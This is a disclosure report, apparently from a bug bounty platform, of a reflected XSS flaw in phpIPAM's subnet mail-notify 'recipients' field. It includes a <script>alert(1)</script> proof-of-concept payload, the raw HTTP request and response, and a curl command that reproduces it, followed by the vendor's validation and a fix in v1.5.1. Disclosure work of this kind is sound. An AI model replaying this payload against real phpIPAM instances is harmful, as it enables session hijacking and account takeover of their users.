Cross Site Scripting (XSS) Reflected in phpipam/phpipam


Reported on

Dec 8th 2022


Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

look in line 94-95 where parameter "recipients" not validation, and i exploit xss with payload <script>alert(1)</script>

91 <tr>
92      <th><?php print _('Recipients'); ?></th>
93      <td>
94          <input type="text" class='form-control input-sm pull-left' name="recipients" style="width:400px;margin-right:5px;">
95          <i class="fa fa-info input-append" rel="tooltip" data-placement="bottom" title="<?php print _('Separate multiple recepients with ,'); ?>"></i>
96      </td>
97  </tr>


POST /phpipam/app/subnets/mail-notify-subnet-check.php HTTP/1.1
Content-Length: 233
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cookie: search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50
Connection: close



HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 03:42:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: phpipam=nud7ajr1q60hh5vldp4n619m50; expires=Fri, 09 Dec 2022 03:42:38 +0000; Max-Age=86400; path=/; SameSite=Lax; HttpOnly;
Vary: Accept-Encoding
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-danger'>Invalid email address - <script>alert(1)</script></div>


curl -i -s -k -X $'POST' \
    -H $'Host:' -H $'Content-Length: 233' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin:' -H $'Referer:' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50' \
    --data-binary $'recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+' \


If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the phpipam team within 24 hours. 4 months ago
ZenalArifin modified the report
4 months ago
ZenalArifin modified the report
4 months ago
ZenalArifin modified the report
4 months ago
We have contacted a member of the phpipam team and are waiting to hear back 4 months ago
3 months ago


hello any update ?

garyallan validated this vulnerability 2 months ago
ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in v1.5.1 with commit 8fbf87 2 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 5th 2023
garyallan published this vulnerability 2 months ago
to join this conversation